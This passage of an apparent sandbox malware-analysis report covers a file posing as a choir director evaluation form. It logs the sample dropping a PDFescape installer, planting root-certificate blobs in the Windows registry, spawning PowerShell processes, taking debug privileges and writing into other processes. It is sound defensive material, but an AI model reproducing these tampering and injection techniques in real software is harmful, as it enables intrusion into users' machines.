ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e76200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb65809000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 PDFescape_Desktop_Installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 PDFescape_Desktop_Installer.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
escape.exepid process 10824 escape.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
PDFescape_Desktop_Installer.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2916 PDFescape_Desktop_Installer.exe 2916 PDFescape_Desktop_Installer.exe 1752 powershell.exe 1752 powershell.exe 3628 powershell.exe 3628 powershell.exe 2692 powershell.exe 2692 powershell.exe 2632 powershell.exe 2632 powershell.exe 4084 powershell.exe 4084 powershell.exe 1908 powershell.exe 1908 powershell.exe 3936 powershell.exe 3936 powershell.exe 4156 powershell.exe 4156 powershell.exe 4284 powershell.exe 4284 powershell.exe 4224 powershell.exe 4224 powershell.exe 1752 powershell.exe 3936 powershell.exe 4084 powershell.exe 3628 powershell.exe 2632 powershell.exe 2692 powershell.exe 4156 powershell.exe 4284 powershell.exe 1908 powershell.exe 4224 powershell.exe 2632 powershell.exe 3936 powershell.exe 1752 powershell.exe 4084 powershell.exe 3628 powershell.exe 2692 powershell.exe 4284 powershell.exe 4156 powershell.exe 1908 powershell.exe 4224 powershell.exe 2916 PDFescape_Desktop_Installer.exe 2916 PDFescape_Desktop_Installer.exe 3628 powershell.exe 3628 powershell.exe 3628 powershell.exe 2632 powershell.exe 2632 powershell.exe 4084 powershell.exe 4084 powershell.exe 1752 powershell.exe 1752 powershell.exe 3628 powershell.exe 3628 powershell.exe 3936 powershell.exe 3936 powershell.exe 2632 powershell.exe 4084 powershell.exe 1752 powershell.exe 3936 powershell.exe 3628 powershell.exe 2632 powershell.exe 2632 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
MicrosoftEdgeCP.exepid process 11416 MicrosoftEdgeCP.exe 11416 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePDFescape_Desktop_Installer.exemsiexec.exevssvc.exedescription pid process Token: SeDebugPrivilege 4084 powershell.exe Token: SeDebugPrivilege 1752 powershell.exe Token: SeDebugPrivilege 3936 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe Token: SeDebugPrivilege 3628 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 4156 powershell.exe Token: SeDebugPrivilege 4284 powershell.exe Token: SeDebugPrivilege 4224 powershell.exe Token: SeShutdownPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeIncreaseQuotaPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeSecurityPrivilege 3932 msiexec.exe Token: SeCreateTokenPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeAssignPrimaryTokenPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeLockMemoryPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeIncreaseQuotaPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeMachineAccountPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeTcbPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeSecurityPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeTakeOwnershipPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeLoadDriverPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeSystemProfilePrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeSystemtimePrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeProfSingleProcessPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeIncBasePriorityPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeCreatePagefilePrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeCreatePermanentPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeBackupPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeRestorePrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeShutdownPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeDebugPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeAuditPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeSystemEnvironmentPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeChangeNotifyPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeRemoteShutdownPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeUndockPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeSyncAgentPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeEnableDelegationPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeManageVolumePrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeImpersonatePrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeCreateGlobalPrivilege 2916 PDFescape_Desktop_Installer.exe Token: SeBackupPrivilege 4572 vssvc.exe Token: SeRestorePrivilege 4572 vssvc.exe Token: SeAuditPrivilege 4572 vssvc.exe Token: SeBackupPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe Token: SeTakeOwnershipPrivilege 3932 msiexec.exe Token: SeRestorePrivilege 3932 msiexec.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
PDFescape_Desktop_Installer.exeescape.exepid process 2916 PDFescape_Desktop_Installer.exe 2916 PDFescape_Desktop_Installer.exe 10824 escape.exe 10824 escape.exe 2916 PDFescape_Desktop_Installer.exe 2916 PDFescape_Desktop_Installer.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
PDFescape_Desktop_Installer.exepid process 2916 PDFescape_Desktop_Installer.exe 2916 PDFescape_Desktop_Installer.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdgeCP.exepid process 7108 MicrosoftEdge.exe 11416 MicrosoftEdgeCP.exe 11416 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Choir-Director-Evaluation-Form.exeChoir-Director-Evaluation-Form.tmpPDFescape_Desktop_Installer.exemsiexec.exedescription pid process target process PID 3680 wrote to memory of 2204 3680 Choir-Director-Evaluation-Form.exe Choir-Director-Evaluation-Form.tmp PID 3680 wrote to memory of 2204 3680 Choir-Director-Evaluation-Form.exe Choir-Director-Evaluation-Form.tmp PID 3680 wrote to memory of 2204 3680 Choir-Director-Evaluation-Form.exe Choir-Director-Evaluation-Form.tmp PID 2204 wrote to memory of 2916 2204 Choir-Director-Evaluation-Form.tmp PDFescape_Desktop_Installer.exe PID 2204 wrote to memory of 2916 2204 Choir-Director-Evaluation-Form.tmp PDFescape_Desktop_Installer.exe PID 2204 wrote to memory of 2916 2204 Choir-Director-Evaluation-Form.tmp PDFescape_Desktop_Installer.exe PID 2916 wrote to memory of 1008 2916 PDFescape_Desktop_Installer.exe regsvr32.exe PID 2916 wrote to memory of 1008 2916 PDFescape_Desktop_Installer.exe regsvr32.exe PID 2916 wrote to memory of 1008 2916 PDFescape_Desktop_Installer.exe regsvr32.exe PID 2916 wrote to memory of 3956 2916 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 2916 wrote to memory of 3956 2916 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 2916 wrote to memory of 3956 2916 PDFescape_Desktop_Installer.exe PDFescapeDesktopInstaller.exe PID 2204 wrote to memory of 1752 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 1752 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 1752 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 2632 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 2632 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 2632 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 3936 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 3936 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 3936 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4084 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4084 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4084 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 3628 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 3628 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 3628 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 2692 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 2692 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 2692 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 1908 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 1908 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 1908 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4156 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4156 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4156 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4224 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4224 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4224 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4284 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4284 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 2204 wrote to memory of 4284 2204 Choir-Director-Evaluation-Form.tmp powershell.exe PID 3932 wrote to memory of 11720 3932 msiexec.exe srtasks.exe PID 3932 wrote to memory of 11720 3932 msiexec.exe srtasks.exe PID 3932 wrote to memory of 15248 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 15248 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 15340 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 15340 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 4184 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 4184 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 4168 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 4168 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 4168 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 3148 3932 msiexec.exe ws.exe PID 3932 wrote to memory of 3148 3932 msiexec.exe ws.exe PID 3932 wrote to memory of 5100 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 5100 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 5312 3932 msiexec.exe updater-ws.exe PID 3932 wrote to memory of 5312 3932 msiexec.exe updater-ws.exe PID 3932 wrote to memory of 14300 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 14300 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 14932 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 14932 3932 msiexec.exe MsiExec.exe PID 3932 wrote to memory of 6180 3932 msiexec.exe MsiExec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"C:\Users\Admin\AppData\Local\Temp\Choir-Director-Evaluation-Form.exe"1⤵
- Suspicious use of WriteProcessMemory
-
